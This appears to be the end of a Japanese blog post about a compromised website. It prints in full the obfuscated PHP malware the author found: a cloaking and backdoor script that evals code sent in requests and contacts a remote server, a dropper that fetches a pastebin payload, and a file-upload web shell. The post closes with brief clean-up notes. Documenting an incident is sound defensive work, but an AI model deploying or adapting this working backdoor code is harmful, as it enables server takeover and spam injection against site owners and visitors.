c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x4f\x5f\x5f\x30\x30"]($OOO_O0__00,$O0_0O0__OO);if(!$O0O0__0O_O){$O00__OOO_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x30"]($OOO_O0__00);if(!$O00__OOO_0["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x4f\x30\x30\x30\x5f"]($OOO_O0__00)){$OO_0_0O_0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x5f\x5f\x4f\x4f\x5f"]($OOO_O0__00);if($OO_0_0O_0O&&(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x30\x4f\x5f\x4f"]($OO_0_0O_0O)=="%0D%0A"||${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x30\x4f\x5f\x4f"]($OO_0_0O_0O)=="%0A")){break;}unset($OO_0_0O_0O);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x4f\x30\x30\x30\x5f"]($OOO_O0__00)){$O00_O_OO0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x4f\x5f\x4f\x30\x30"]($OOO_O0__00,8192);$O_00__O0OO.=$O00_O_OO0_;unset($O00_O_OO0_);}}unset($O00__OOO_0);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x5f\x30\x4f\x30\x30"]($OOO_O0__00);}else{if(substr($O0O_O00_O_,-1)=='e'){$O0OO_00__O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x4f\x30\x5f\x5f\x30"]($O_00O0OO__);$OOO_O0__00=$O0O_O00_O_(AF_INET,SOCK_STREAM,0);if(socket_connect($OOO_O0__00,$O0OO_00__O,$O_O0_OO_00)){if(!$O0O0__0O_O){socket_write($OOO_O0__00,$O0_0O0__OO,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]($O0_0O0__OO));while($O_O00_O_0O=@socket_read($OOO_O0__00,8192)){$O_00__O0OO.=$O_O00_O_0O;unset($O_O00_O_0O);}$O_00__O0OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x5f\x30\x4f"]("\\r\\n\\r\\n",$O_00__O0OO);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x30\x4f\x5f\x4f"]($O_00__O0OO);$O_00__O0OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x30\x30\x5f\x4f"]("\\r\\n\\r\\n",$O_00__O0OO);}else{$O_O0_O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x4f\x4f\x30\x30"](2,5);$O000O__OO_=0;while($O000O__OO_<$O_O0_O00_O){socket_write($OOO_O0__00,$O0_0O0__OO,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]($O0_0O0__OO));$O000O__OO_++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x30\x4f\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x4f\x4f\x30\x30"](50000,100000));}unset($O000O__OO_,$O_O0_O00_O);}}socket_close($OOO_O0__00);unset($O0OO_00__O);}}unset($O0_0O0__OO,$O0O_O00_O_,$OOO_O0__00,$O_O0_OO_00,$O_00O0OO__);if(!$O0O0__0O_O){$O_00__O0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x30\x4f\x5f\x30"]('/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)'.'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si','O__0_O00OO',$O_00__O0OO);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x30\x4f\x5f\x4f\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x30\x4f\x5f\x4f\x30\x4f"]($O_00__O0OO,"\\xEF\\xBB\\xBF"));}else{return 1;}}function O__0_O00OO($matches){return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f\x4f\x30"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]($matches[2])?$matches[2]:$matches[0];}function O_OO_O000_($O_OOO00_0_){$OO0O__0_O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x4f\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x4f\x5f\x30\x5f"]($O_OOO00_0_));$O_0__0OOO0=substr($OO0O__0_O0,0,5);$O0_O0_O0O_=substr($OO0O__0_O0,-5);$O_OO_00O0_=substr($OO0O__0_O0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO0O__0_O0)-10);return $O_0__0OOO0.'hT'.substr($OO0O__0_O0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]($OO0O__0_O0)-10).'tP'.$O0_O0_O0O_;}function O__0_O0OO0($O_OOO00_0_){$O_0__0OOO0=substr($O_OOO00_0_,0,5);$O0_O0_O0O_=substr($O_OOO00_0_,-5);$O_OO_00O0_=substr($O_OOO00_0_,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]($O_OOO00_0_)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x30\x30\x4f\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"]($O_0__0OOO0.$O_OO_00O0_.$O0_O0_O0O_));}function O00_0OO_O_($O_00_0_OOO=''){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"})){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"])){$O_00_0_OOO=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"];}else if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"])){$O_00_0_OOO=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"];}else{$O_00_0_OOO=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];}}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f\x4f"]('HTTP_X_FORWARDED_FOR')){$O_00_0_OOO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f\x4f"]('HTTP_X_FORWARDED_FOR');}else if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f\x4f"]('HTTP_CLIENT_IP')){$O_00_0_OOO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f\x4f"]('HTTP_CLIENT_IP');}else{$O_00_0_OOO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f\x4f"]('REMOTE_ADDR');}}return $O_00_0_OOO;}function O_OO_00_O0($O_OOO00_0_=''){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $O_OOO00_0_;}function O0O_O0__0O($O0O_0_O0_O){$O0_O0__O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O0O_0_O0_O);$O0O_0_O_0O='';for ($O000O__OO_=0;$O000O__OO_<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x5f\x5f\x5f\x30\x30\x4f"]($O0_O0__O0O);$O000O__OO_++){if($O000O__OO_%2!=0){$O0O_0_O_0O.=$O0_O0__O0O[$O000O__OO_];}}return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"]($O0O_0_O_0O);}function OOO0O_0_0_($O_00__O0OO){$O_00__O0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x4f\x5f\x4f\x30\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"]($O_00__O0OO));$O_0_O0_0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x30\x5f\x30\x4f\x4f\x4f"]("/\\|/si",$O_00__O0OO,-1,PREG_SPLIT_NO_EMPTY);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x4f\x30\x30\x4f\x30\x4f"]($O_0_O0_0OO)){return false;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x5f\x5f\x5f\x30\x30\x4f"]($O_0_O0_0OO)<2){return false;}$O_00__O0OO_array["\x64\x61\x74\x61"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x4f\x30\x5f\x30\x4f"]($O_0_O0_0OO);$O_00__O0OO_array["\x64\x61\x74\x61"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"]($O_00__O0OO_array["\x64\x61\x74\x61"]);$O_00__O0OO_array["\x68\x65\x61\x64\x65\x72\x73"]=$O_0_O0_0OO;return $O_00__O0OO_array;}function OOO0__0_O0($O0OO0__O0_=''){$OO_O0O0_0_=O__0_O0OO0('K8pPyvMi8p1iuEMpKAEA');if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x5f"]($OO_O0O0_0_)){@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x30\x4f\x4f\x5f"]($OO_O0O0_0_);}if($O0OO0__O0_==''){$O0OO0__O0_=O__0_O0OO0('08soSBCUxOTi0XvuBgA=');}$O_00__O0OO=O__0_O0OO0('lVFNrxp5swEPxBvZiPSHB4h0CDgRDKR7DBN2waQ7ABlQTC+/VFIU9pT1VPq1nN7MzuRgcyUIg+z9gBhcq51+g9c4VB8lpcXKtndtt6V/3oHcyFQLR40BkpNLUAJoJ27dp/Vk46f6KpVVM4HyPbhCV+CAaUuoJhH/HeSKQYSR6GRZ5cS3vf5E1dF9JUKns3l65lMOm0JTbuDNbzBYr76qUH3ervPq5U3QGCd+CFR6qGv06fxfzCNYHKQJttTqXtb2u+rsT6Nsut5gDPM1HF/cXXmK2AEqIbSd8apoZLmVuALe8ewclQQXN56v55hw17kCxUBbzAj9G+ztNfe3/Xj9FByDM222q9jweViTjrvLxavRMRyNM3W/ii0vzVFzlUVgOVGT+r+jGTSGNSAJL5NVMzHsxD+qXLOjSS1PpZ4l27/o1teWMepBY9O+APbThRGXM/v6UJclCCwiwHxD8f0I84U5xLuq8DXPwnP37zka9QuGZr9tOWhT9/4Dm3Ux73RgDeu0fZP84+M3');$O_00__O0OO=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"]($O_00__O0OO);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x5f"]($O0OO0__O0_)){$O0O0_OO__0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x5f\x5f\x4f\x4f"]($O0OO0__O0_);if($O_00__O0OO==$O0O0_OO__0){return;}}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x5f\x5f\x30\x30"]($O0OO0__O0_,0777);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x4f\x30\x30\x5f\x5f"]($O0OO0__O0_,$O_00__O0OO);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x5f\x5f\x30\x30"]($O0OO0__O0_,0644);}function O__0_0OOO0($O0_O0OO__0,$OOO00O0___){$O0_O00O__O=O__0_O0OO0('yygpKjySi20tcvLy/XS8/PT89J1UvOz9UvyMxLty/OLEnNTSywVS1WLdZaPXLQYA');$O0O_O_O_00=sprintf($O0_O00O__O,$OOO00O0___["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$OOO00O0___["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],$O0_O0OO__0);$O_O00O_O_0=OO_O0O_0_0($O0O_O_O_00);if(isset($_REQUEST["\x73\x74"])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x4f\x30"]($O0O_O_O_00);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x4f\x30"]($O_O00O_O_0);die();}$O0_O_0_OO0=O__0_O0OO0('S8/PTla89zKJBQA=');$O0O0O__0O_=O__0_O0OO0('Ky5NTbHk4FdtLgYA');$O0_00O_O_O=O__0_O0OO0('S0vMzJVEllSNAQA=');if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x4f\x5f\x5f"]($O_O00O_O_0,$O0_O_0_OO0)!=false){die($O0O0O__0O_);}else{$O0_O00O__O=O__0_O0OO0('yygpKUSbDS1y8vL9dLz89Pz0nVS87P1S/IzEu3L84sSc1NLLBVLVYt1lchqtBgA=');$O0O_O_O_00=sprintf($O0_O00O__O,$OOO00O0___["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],$OOO00O0___["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],$O0_O0OO__0);$O_O00O_O_0=OO_O0O_0_0($O0O_O_O_00);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x4f\x5f\x5f"]($O_O00O_O_0,$O0_O_0_OO0)!=false){die($O0O0O__0O_);}die($O0_00O_O_O);}}function O__O_0O0O0($zzz){$O___0OOO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x5f\x4f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x4f\x4f\x30"](),"z1zz");$OO0_O__00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x4f\x30\x4f\x5f\x30\x5f"]((${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x30\x4f\x4f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x5f\x4f\x30\x5f\x5f"]($zzz)))));$O_0OO0__O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"]("PD9waHA=");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x4f\x5f\x5f"]($OO0_O__00O,$O_0OO0__O0)===false){$OO0_O__00O=$O_0OO0__O0.PHP_EOL.$OO0_O__00O;}@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x4f\x30\x30\x5f\x5f"]($O___0OOO00,$OO0_O__00O);@require($O___0OOO00);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x30\x4f\x4f\x5f"]($O___0OOO00);die();}function OO00O0O___($O0O_0_O0_O){$OOO00O0___=array();$OOO00O0___["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]=$O0O_0_O0_O;$OOO00O0___["\x61\x70\x69"]=O0O_O0__0O($OOO00O0___["\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"]);$OOO00O0___["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]=O_OO_00_O0();$OOO00O0___["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$OOO00O0___["\x72\x65\x66\x65\x72\x65\x72"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:'';$OOO00O0___["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"]=isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:'';$OOO00O0___["\x69\x70"]=O00_0OO_O_();if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"])){$OOO00O0___["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]=O__0_O0OO0('yygpKqHSi20tcKcHAA==');}else{$OOO00O0___["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"]=O__0_O0OO0('yygpKUQbDpRS1wcA');}if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"])){$OOO00O0___["\x6c\x61\x6e\x67\x75\x61\x67\x65"]=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"];}else{$OOO00O0___["\x6c\x61\x6e\x67\x75\x61\x67\x65"]="";}if(isset($_REQUEST["\x70\x61\x72\x61\x6d\x73"])){$OO0_O_O00_=O__0_O0OO0('c87PKqL0nNK9EtqSxItUosKMjJTE4syczP088qzs8mHDAA==');header($OO0_O_O00_);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x30\x4f\x4f\x4f\x30\x5f"]('json_encode')){echo ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x30\x4f\x5f\x5f\x4f\x30"]($OOO00O0___);}else{${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x30\x5f\x5f\x30\x4f\x5f"]($OOO00O0___);}die();}if(isset($_REQUEST["\x64\x5f\x74\x69\x6d\x65"])){die('2021/12/10');}if(isset($_REQUEST["\x70\x77\x64\x31\x36\x33"])){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x4f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x30\x4f\x5f\x4f\x30\x4f"]($_REQUEST["\x70\x77\x64\x31\x36\x33"]))=="971aa349969bf565d71cf4b36fa166b2"){$OO0_O__00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x4f\x30\x4f\x5f\x30\x5f"]((${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x30\x4f\x4f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x5f\x4f\x30\x5f\x5f"]($_REQUEST["\x7a\x7a\x7a"])))));$O_0OO0__O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"]("PD9waHA=");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x4f\x5f\x5f"]($OO0_O__00O,$O_0OO0__O0)===false){$OO0_O__00O=$O_0OO0__O0.PHP_EOL.$OO0_O__00O;}if(isset($_REQUEST["\x65"])){$OO0_O__00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x4f\x30\x4f\x5f\x30"]($O_0OO0__O0,"",$OO0_O__00O);$O0O_O00_O_='e'.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x5f\x30"]("dmE=").'l';$O0O_O00_O_($OO0_O__00O);die();}$O___0OOO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x30\x5f\x30\x4f\x5f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x4f\x5f\x5f\x30\x30"]($O___0OOO00,$OO0_O__00O);$O0___O0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x30"]($O___0OOO00);@require($O0___O0OO0["\x75\x72\x69"]);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x5f\x30\x4f\x30\x30"]($O___0OOO00);die();}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x4f\x5f\x4f\x30"]($_REQUEST["\x70\x77\x64\x31\x36\x33"]."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"])){$O0_O0OO__0=${"\x5f\x47\x45\x54"}["\x73\x69\x74\x65\x6d\x61\x70"];O__0_0OOO0($O0_O0OO__0,$OOO00O0___);}}}OOO0__0_O0();$O_0O_0OO_0=array('domain'=>$OOO00O0___["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],'request_url'=>$OOO00O0___["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"],'ip'=>$OOO00O0___["\x69\x70"],'agent'=>$OOO00O0___["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"],'referer'=>$OOO00O0___["\x72\x65\x66\x65\x72\x65\x72"],'protocol'=>$OOO00O0___["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],'language'=>$OOO00O0___["\x6c\x61\x6e\x67\x75\x61\x67\x65"]);$O_00__O0OO=OO_O0O_0_0($OOO00O0___["\x61\x70\x69"],0,2,$O_0O_0OO_0,array(),$OOO00O0___["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"]);if(isset($_REQUEST["\x64\x75\x6d\x70"])){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x4f\x30"]($O_00__O0OO);$O_00__O0OO=OO_O0O_0_0("http://google.co.jp");${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x30\x5f\x4f\x5f\x4f\x30"]($O_00__O0OO);die();}$O00_O_OO0_=OOO0O_0_0_($O_00__O0OO);if($O00_O_OO0_!==false){foreach($O00_O_OO0_["\x68\x65\x61\x64\x65\x72\x73"] as $OO0_O_O00_){@header($OO0_O_O00_);}echo $O00_O_OO0_["\x64\x61\x74\x61"];die();}}OO00O0O___($O0O_0_O0_O);
?>

バックドアのコード

<?php
fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/DKIZ.php','w+'),file_get_contents('https://pastebin.com/raw/NU6Aw69N'));
?>
<?php error_reporting(0); if(isset($_GET["DKIZ"])) { echo 'Dit me may'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } } ?>

バックドアから、.htaccessと、index.phpが
書き換えられたわけですね><

 

対策したこと

脆弱性の対応、出来てなかった、ということで、
とりま、mtを凍結。

.phpファイルをあぶり出し削除。

 

 

-